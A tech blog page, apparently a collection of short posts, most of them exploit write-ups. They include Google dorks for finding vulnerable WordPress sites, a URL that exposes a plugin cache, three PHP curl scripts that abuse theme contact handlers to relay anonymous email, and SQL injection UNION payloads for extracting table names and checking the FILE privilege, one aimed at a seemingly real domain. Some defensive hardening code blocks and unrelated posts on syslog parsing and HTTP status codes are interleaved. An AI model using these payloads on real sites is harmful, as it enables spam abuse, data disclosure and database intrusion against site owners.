Compuhowto.com

wp_options is marked as crashed

A recent corruption of this site's database left me questioning my backup integrity. Thankfully I was able to fix my tables without having to do a restore, and this is how I did it.


WordPress Plugin Exploit wp-file-cache information disclosure

########################################################################
#
# Exploit Title: WordPress plugin wp-file-cache
# Date: 2014 12 December
# Author:
# Vendor:
# Security Risk: Medium
# Category: WebApps
# Google Dork: inurl:/wp-content/plugins/wp-file-cache/
# Tested on: Linux
#
########################################################################

Exploit : Information disclosure (user names, hashed passwords, etc.)

Browse to the URL http://www.example.com/wp-content/plugins/wp-file-cache/cache/
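The exposure above comes from a cache directory that the web server is happy to list and serve. As an added example (not code from the original post or from the wp-file-cache plugin), the helper below blocks HTTP access to such a directory and removes directory indexing; it assumes the plugin reads its cache from disk rather than over HTTP, and the path passed at the bottom is a constructed one matching the directory named in the post.

```php
<?php
// Added example: deny web access to a plugin cache directory.
// Assumes Apache with .htaccess overrides enabled; on nginx the same
// effect needs a "location ... { deny all; }" block in the server config.

function protect_cache_dir(string $cacheDir): array
{
    $written = [];
    if (!is_dir($cacheDir) && !mkdir($cacheDir, 0750, true)) {
        throw new RuntimeException("cannot create $cacheDir");
    }
    // Refuse every request into the directory (Apache 2.4 and 2.2 syntax)
    // and switch off automatic indexes as a second line of defence.
    $htaccess = "Options -Indexes\n"
        . "<IfModule mod_authz_core.c>\n  Require all denied\n</IfModule>\n"
        . "<IfModule !mod_authz_core.c>\n  Deny from all\n</IfModule>\n";
    // index.php: a server that ignores .htaccess still returns an empty
    // page instead of a listing when indexes are enabled.
    $files = [
        '.htaccess' => $htaccess,
        'index.php' => "<?php\n// Silence is golden.\n",
    ];
    foreach ($files as $name => $body) {
        $path = rtrim($cacheDir, '/') . '/' . $name;
        if (!file_exists($path) && file_put_contents($path, $body) !== false) {
            $written[] = $name;
        }
    }
    // Keep cached data unreadable to other local accounts as well.
    chmod($cacheDir, 0750);
    return $written;   // names of the guard files created on this run
}

// Constructed path for illustration; run from the WordPress root.
print_r(protect_cache_dir(__DIR__ . '/wp-content/plugins/wp-file-cache/cache'));
```

Moving the cache directory outside the document root altogether is the stronger fix when the plugin allows configuring it.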

# 12/12/2014

HTTP Error Messages

We have all seen them before: 500, 404, and so on. What do they mean, and why do we get them? Below is a list of HTTP status messages.

1xx – Informational
100 Continue – The server has received the request headers, and the client should proceed to send the request body.

101 Switching Protocols – The requester has asked the server to switch protocols

103 Checkpoint – Used in the resumable requests proposal to resume aborted PUT or POST requests


WordPress Theme Exploit submit_contact_widget

WordPress submit_contact_widget / submit_contact_form anonymous email issue.

########################################################################
#
# Exploit Title: WordPress submit_contact_widget / submit_contact_form
# Date: 2014 28 November
# Author:
# Vendor:
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/modernize-v3-15
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$site = 'http://site.com/wp-admin/admin-ajax.php';
$ch = curl_init($site);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
 array(
 'action' => "submit_contact_widget",
 'widget-contactName' => "hpoot",
 'widget-email' => "thememail@test.com",
 'widget-comments'=> "Hello from theme",
 'receiver-email' => "larrywaters@mailinator.com"
 ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

# 11/28/2014

WordPress Theme Exploit mk_contact_form


########################################################################
#
# Exploit Title: WordPress mk_contact_form
# Date: 2014 28 November
# Author:
# Vendor: 
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/jupiter
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$site = 'http://site.com/wp-admin/admin-ajax.php';
$ch = curl_init($site);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array(
                'action' => "mk_contact_form",
                'name' => "hpoot",
                'email' => "thememail@test.com",
                'phone' => "555-555-5555",
                'content'=> "Hello from theme",
                'to' => "larrywaters@mailinator.com"
        ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>


# 11/28/2014

Illegal mix of collations for operation 'UNION'

Error in query: Illegal mix of collations for operation 'UNION'

You have found the injection point and are trying to extract the table names when the error above pops up. Why is this happening, and what tricks can we use to get past it and extract the data?

First let me explain why this error occurs. MySQL raises it when the columns combined by the UNION use different character sets or collations, so it cannot choose a single collation for the result. Simple enough, so how do we get around this problem?

What you have to do is convert the data being extracted. To do this we can do the following:

1. unhex(hex(group_concat(table_name)))

http://www.example.com/events.php?id=3 UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 from information_schema.tables where table_schema = database()--

2. convert(group_concat(table_name)+using+ascii)

http://www.mamatrash.com/events.php?id=3 UNION SELECT 1,2,3,convert(group_concat(table_name)+using+ascii),5,6,7 from information_schema.tables where table_schema = database()--

You should now have the extracted table names. If I learn more tricks I will include those as well.

SQL Injection File Privilege

In this short how-to I will show you how to verify whether the current user has the FILE privilege.

First make sure you have found an injectable location.

www.example.com/events.php?id=1'

Next using your union statement try the following:

www.example.com/events.php?id=-1 union select 1,grantee,3,is_grantable FROM information_schema.user_privileges--

The is_grantable column is the one to look at. It will read either 'YES' or 'NO'.

Python Parse Syslog

A little Python script to parse DST, SRC, PROTO, SPT and DPT out of your syslogs.

First install sysklogd: apt-get install sysklogd
Next, on your router, forward syslog to your machine.
Finally, use the code below to extract the information from the /var/log/kern.log file.

#!/usr/bin/env python
import re

# Firewall entries in kern.log carry fields such as
# SRC=<ip> DST=<ip> PROTO=<name> SPT=<port> DPT=<port>; the regexes pull those out.

def writeips(i):
    # Append one extracted record per line to the output log.
    with open("/var/log/ips.log", "a") as t:
        t.write(i + '\n')

def readsyslg():
    with open("/var/log/kern.log", "r") as f:
        for line in f:
            ips = re.findall(r"SRC=[0-9.]+\s+DST=[0-9.]+", line)
            pro = re.findall(r"PROTO=[A-Z.]+", line)
            prt = re.findall(r"SPT=[0-9.]+\s+DPT=[0-9.]+", line)
            if ips:  # lines without SRC/DST are not firewall entries; skip them
                writeips(" ".join(ips + pro + prt))

def main():
    readsyslg()

if __name__ == "__main__":
    main()

If you have improvements for this script, leave them in the comments to be added or modified.

WordPress Theme Bretheon Email


########################################################################
#
# Exploit Title: WordPress Theme bretheon
# Date: 2013 23 November
# Author:
# Vendor: 
# Security Risk: low
# Category: WebApps
# Google Dork: inurl:/wp-content/themes/bretheon/
# Tested on: Linux
#
########################################################################

Exploit : Send Anonymous Email

<?php
$ch = curl_init("http://www.example.com/wp-content/themes/bretheon/functions/theme-mail.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array(
                'To' => "hpoot@mailinator.com",
                'Name' => "theme-mail",
                'Email' => "fakeuser@thissite.com",
                'Message'=> "Hello from bretheon theme",
                'Subject' => "This is a test"
        ));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
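The submit_contact_widget, mk_contact_form and bretheon theme-mail.php issues above share one root cause: the handler takes the recipient address from the request, so anyone who can POST to it can relay mail anywhere. As an added example (not code from any of the themes named), the vulnerable shape is shown next to a hardened WordPress AJAX handler; the option name contact_form_recipient, the nonce action contact_form_nonce (emitted into the form with wp_create_nonce and posted as the field nonce) and the AJAX action site_contact_form are assumptions.

```php
<?php
// Added example, not theme code: recipient fixed server-side, nonce checked,
// every user-supplied field validated before it reaches wp_mail().

// Vulnerable shape: whoever can POST to admin-ajax.php chooses the recipient.
function vulnerable_contact_handler() {
    wp_mail($_POST['to'], 'Contact form', $_POST['content']);   // DO NOT USE
}

// Hardened handler.
function hardened_contact_handler() {
    check_ajax_referer('contact_form_nonce', 'nonce');   // dies on a bad nonce

    $to = get_option('contact_form_recipient');          // set by the site admin
    if (!is_email($to)) {
        wp_send_json_error('form not configured', 500);
    }
    $name    = sanitize_text_field($_POST['name'] ?? '');      // strips CR/LF
    $email   = sanitize_email($_POST['email'] ?? '');
    $message = sanitize_textarea_field($_POST['content'] ?? '');
    if ($name === '' || !is_email($email) || $message === '') {
        wp_send_json_error('invalid input', 400);
    }
    // The visitor only ever appears in Reply-To; is_email() rejects
    // newlines, so the header cannot be split into extra headers.
    $headers = ['Reply-To: ' . $name . ' <' . $email . '>'];
    $subject = 'Contact form message from ' . home_url();
    $body    = "From: $name <$email>\n\n$message";

    if (!wp_mail($to, $subject, $body, $headers)) {
        wp_send_json_error('mail failed', 500);
    }
    wp_send_json_success();
}
add_action('wp_ajax_site_contact_form', 'hardened_contact_handler');
add_action('wp_ajax_nopriv_site_contact_form', 'hardened_contact_handler');
```

The nonce stops cross-site submissions but not a script that fetches the form first, so abuse of the form as a spam source against the fixed recipient still needs rate limiting or a challenge, which this example leaves out.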


# 11/23/2013

Copyright © 2016 Compuhowto.com
